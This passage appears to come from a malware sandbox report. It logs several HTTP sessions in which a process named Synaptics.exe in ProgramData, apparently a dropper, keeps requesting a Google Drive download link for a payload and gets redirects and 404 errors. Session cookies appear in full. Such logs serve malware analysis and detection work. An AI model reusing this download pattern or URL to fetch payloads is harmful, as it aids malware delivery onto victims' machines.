                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:47 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5OQzorC_VRjjX91Eqr639HPJt6Ex0xcQM8dCajVRyhvtaykcIp1lRcHxj7-p5OqkCD
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-6WdV3s622MRrNsEv6h-DZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:47 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:47 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="0Emcys-PvDlv5EIW3vsZrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:47 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.11 | 49967 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:46 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
2024-12-30 10:25:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-XH0uVXpPQHQZlv6TFLzAHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.11 | 49976 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:47 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:47 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7sJu-SL0N5mzEfzGbZXJbejdKpavIyM1v9v6QTaSeygv_ktc1Y-Pz3ggFkoxrcXd6v
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xXB9wz8cNx2a8xNRmRL6KQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:47 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:47 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="8mKySF_zhrR4hRCy5Ipi1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:47 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.11 | 49977 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:47 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr
2024-12-30 10:25:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-LefobZROHepsQf2ROX5G6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      60 | 192.168.2.11 | 49983 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:47 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ec1S7Z-hwGEjyR3wCj4dKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      61 | 192.168.2.11 | 49984 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:47 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:48 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5pQD3No1ypbTfx7PvASXBqIbdAH8d5K0uu7YQQQ2LHk8OKa2Ul4vKBWW4m4fpNUX15q4T5EJQ
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-5bylDbVJyegCWBl8Fetrhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:48 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:48 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="p8HvoBLfqJuPhwrbEihtfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:48 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      62 | 192.168.2.11 | 49992 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:48 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:49 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5Xtnm1YVCBj1g6Lk_Trfvx1Bsit2YY-n8hnozM9gK6ZXBYGAyJLtHlxkJeXKgP2i3-8isZXcs
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-JkAS7PjkOkv0bfdkwH9hyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:49 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:49 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="_owvgnCMHmz9wYsEcIy-zw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:49 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      63 | 192.168.2.11 | 49991 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:48 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:49 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Let5wgjCNHdyJlORqjG3bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      64          192.168.2.11  49993        172.217.18.110   443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:49 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:49 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-uUdgpHTQdWOTLKi-ZtekjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      65          192.168.2.11  49994        142.250.181.225  443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:49 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:49 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC45Il4GCSjEZv_NmyOjz94b8tzFKZutokNLBWNlknnfhAk1YUAKdGVj15exIK7GdmZxjkkXlqw
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
